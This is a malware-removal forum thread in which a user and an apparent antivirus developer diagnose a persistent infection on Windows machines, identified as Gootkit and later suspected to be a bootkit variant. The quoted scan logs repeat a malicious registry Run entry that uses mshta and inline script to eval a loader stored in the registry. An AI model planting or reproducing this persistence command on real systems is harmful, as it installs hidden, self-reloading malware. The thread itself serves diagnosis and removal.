Adlice forum
General Category => Malware removal help => Topic started by: Jojo51 on December 22, 2014, 12:47:54 PM
-
Hi,
We use Roguekiller for years and we found with it the best cleaning tool that we can add to our antivirus solution. You doing a great job and its a luck to being able to use your software to solve some crisis situations.
Sadly, we are reporting a new rootkit that have infected several computers on our network. This virus infect principal Windows process as "explorer.exe", "svchost.exe" and others by injecting his code on the fly. Roguekiller report the infection, can kill few infected process on memory but not clean it. Each time we make a scan with RK, the threat is back on the same process over and over.
In addition, the issue reported by our users is that they cannot work on their computer because the screen always flashing and showing a windows that ask to install a trusted certificate. The screen flashing because when the virus start its bad job, the antivirus (ESET Endpoint) kills the infected process but without being able to clean the infection. It seems that the virus only works completely on the user profil used to install it, we log on on the local administrator session without getting this error flashing message. But, even when we scan the system through this session, it reports some infested process (injected) but less.
You can find the RogueKiller's scan report and the screenshot of the error in this archive.
Hope you will provide a solution.
Best regards,
J. PEREIRA
-
Hello
Any chance to get a explorer.exe full dump? I'd like to extract the payload, that should help us to put a name on the infection.
EDIT: also, could you analyse that file on virus total? C:\Windows\cwbrxd.exe
-
Hi!
Thanks for the quick answer! :)
We have analysed the "cwbrxd.exe" file on VirusTotal but it doesn't report any infection. Through this link, you will find an archive with two "explorer.exe" dumps files because we found two of them in memory, but impossible to know which is the good one...
http://users.hexanet.fr/~pereira/explorer.zip
Thanks a lot for any help you can grant! :)
Best regards,
J. PEREIRA
-
Thanks, I'll take a look shortly.
-
VT came back clean https://www.virustotal.com/fr/file/6c1b0f6a4a765ebac4d742f1d62ceace2339941482a19f56b81b2841575d3cd6/analysis/1419261925/
I can see openssl related code in the dumped section, but no string that could help us.
Can you scan with Malwarebytes?
-
Yes, we already did the Anti-Malware and even Anti-Rootkit scan, this afternoon for the third time. No infection reported by this tools. :(
By the way, our ESET Antivirus report now a threat on its log, speaking about a "Kryptic" virus variant. If it can help... ;)
-
Where is the threat reported?
Could be useful to scan with OTL: http://www.bleepingcomputer.com/download/otl/
-
Hi!
Still working hard on the subject without finding a solution. :(
We've done the scan with OTL as you asked in your last post, but it cannot clean anything too. :( You can find the log in attachment.
Thanks for your help! :)
J. PEREIRA
-
This is uncommon:
PRC - C:\Windows\SysWOW64\svchost.exe [comLaunch] (Microsoft Corporation)
PRC - C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation)
on x64, having system processes on 32 bits can be suspicious.
And indeed:
O4 - HKU\.DEFAULT..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-18..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-19..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-20..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-21-1742386255-4278694884-558714565-500..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
That looks like Poweliks.
Could you give me a dump (in raw hive format!) of the registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
It's very important, please.
EDIT: dump can be made with regedit, right click => export. chose the raw format, not .reg
-
And also, please do the same for that key:
HKEY_CURRENT_USER\Software\ xsw\loader (mind the space)
-
Many thanks for your feeback, I will get the informations you need and send you as quick as possible ! :)
-
By the way Malwarebytes should be able to remove it.
-
Hi!
First, I wish you all the best to all the Virus "Threat Fighters" for the new 2015 year!! :)
Back to the business...
Sorry for the delayed answers, I have investigated and spent a lot of time in this issue and discovered some usefull informations. So, thanks to your last message, I found infection in the registry at differents locations. The virus seems to put install itself in each NTUSER.DAT file that constitue the hive registry linked to each user. I each ones, I find track of it, here what it is :
Found an "xsw" registry key in HKEY_CURRENT_USER\Software\ xsw\
Found an "cxsw" registry key in HKEY_CURRENT_LOCAL_MACHINE\Software\
Found multiples binary in HKEY_CURRENT_USER\Software\ AppDataLow\
Found an value "Rundll32" in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Deleting the xsw registry key, binaries in AppDataLow and rundll32 value in RUN key seems to be good because the antivirus stop to report the threat after the reboot. BUT, the cxsw still comes back after the first reboot and the virus seems to be always in the system, RogueKiller still reporting the injected process in explorer.exe and others.
So, that is what I can bring you as new informations. At this address, http://users.hexanet.fr/~pereira/Virus.zip , you will find the dumps you asked, in differents formats to be sure you can exploit it. Anti-Malware doesn't solve anything, it even fail to report the infection... :(
Thanks again for your help, I hope that you will find the solution. :)
Best regards,
J. PEREIRA
-
Ok gotcha.
I would need to have a dump of explorer.exe also, can you download/start process hacker and make a full dump of it? Also, do you have several explorer.exe processes? The dump is quite big, but you should be able to share it with Google Drive/Dropbox.
That would help me to make a signature for the injected process.
A things that may work for the removal:
- Start Roguekiller, the prescan will kill the injected processes. Leave it without doing the scan (won't find anything anyway)
- With regedit, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run , and remove the rundll32 value.
- Reboot, let me know if the threat is gone.
-
Yes, here the new "explorer.exe" created via Process Hacker : http://users.hexanet.fr/~pereira/explorer.exe.dmp
Already done this with RogueKiller, but the threat is still back after the reboot. The most strange is that on some computers, the threat seems to no be completely installed because I cannot find all the tracks that we spoke about in my last post. But, error message that show the "certificate Installation" is still present, RogueKiller still find Injected proc in services.exe, isass.exe, explorer.exe etc... >:(
That's an big one! :(
-
mmh, wide inject. I think the key is protected by all the injected processes.
The only way would be to remove the key "offline". Like with an OTLPE cd: http://oldtimer.geekstogo.com/OTLPENet.exe
That's a CD ISO + burner software, that you can use to boot onto, and then it's a full windows environment.
If you're advanced user you'll find a regedit able to mount extern hives, let me know if you think to be able to do it.
-
Looks like your malware is named "Gootkit": https://www.virustotal.com/fr/file/2a8eaa50b4c7c8b75f317fce2a3bc344109923ab65d91de6a6d571e829cbb68a/analysis/1420213053/
-
EP_X0FF has created a thread on kernel mode for that new infection, we're still analysing it, and searching its weaknesses.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669
-
It looks like a simple Run value removal is enough to remove the malware.
Can you please confirm once again?
-
Here's the infection log from the beta version of RogueKiller. I can put it online for testing if you need.
RogueKiller V10.1.1.0 [Dec 23 2014] par Adlice Software
email : http://www.adlice.com/contact/
Remontées : http://forum.adlice.com
Site web : http://www.adlice.com/fr/logiciels/roguekiller/
Blog : http://www.adlice.com
Système d'exploitation : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Démarré en : Mode normal
Utilisateur : tigzy [Administrateur]
Mode : Scan -- Date : 01/03/2015 15:37:17
Commutateurs : -nokill
¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]
¤¤¤ Registre : 10 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)
¤¤¤ Tâches : 0 ¤¤¤
¤¤¤ Fichiers : 0 ¤¤¤
¤¤¤ Fichier Hosts : 2 ¤¤¤
[C:\WINDOWS\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\WINDOWS\System32\drivers\etc\hosts] ::1 localhost
¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)
¤¤¤ Navigateurs web : 0 ¤¤¤
¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 4086 MB
User = LL1 ... OK
User = LL2 ... OK
============================================
RKreport_SCN_01032015_152034.log
-
Hi!
Sounds good, it looks like that you've done a great job! Thank you very much!!
Yes, if you can give me the new version I will test it on our infected computers. I will be your BETA tester !! :D
Speak soon,
Johnny
-
No, simply deleting the RUN value doesn't stop the infection. It seems that there is still something in it that makes the explorer.exe crash in loop.
-
You may want to try that version: http://download.adlice.com/RogueKiller_beta.exe
-
Thanks! I've just downloaded it.
Need I start it in safe mode or normally? Does it clean all the infected hives or only the one with the program is started??
Sorry for the questions, but I want to be sure to use your tool with the best practice! ;)
Johnny
-
All the hives are cleaned.
In normal mode should be ok.
Should you need additional info: http://www.adlice.com/gootkitxswkit-removal-roguekiller/
-
Bad news :(
I have tested the BETA but it seems to fail to clean the infection. It can find it, start the remove but after the next reboot, the threat is back. We can spot it when we restart RogueKiller. You will find in attachment the two scan report, the first and the second after the cleaning/reboot.
Thanks for the help.
Johnny
-
Jojo51, any chance I could remote access on one of the infected computer with TeamViewer?
I think that rootkit did download some friend to join the party, and maybe it's protecting it. That's unusual, but very possible.
I'll send you an MP to meet on skype.
EDIT: The RUN key hasn't been found. Strange.
-
Yes, no problems! :) We can plan a Teamviewer session on an infected computer today @03:00pm (french time).
You can use my email (**********) to add me in Skype, I'm logged on at the moment.
Does it sound ok for you?
-
Will contact you on skype.
(I'm removing your address to avoid spam)
-
For those who were following, it's probably the bootkit version of Gootkit.
So MBR/VBR infection of type Rovnix.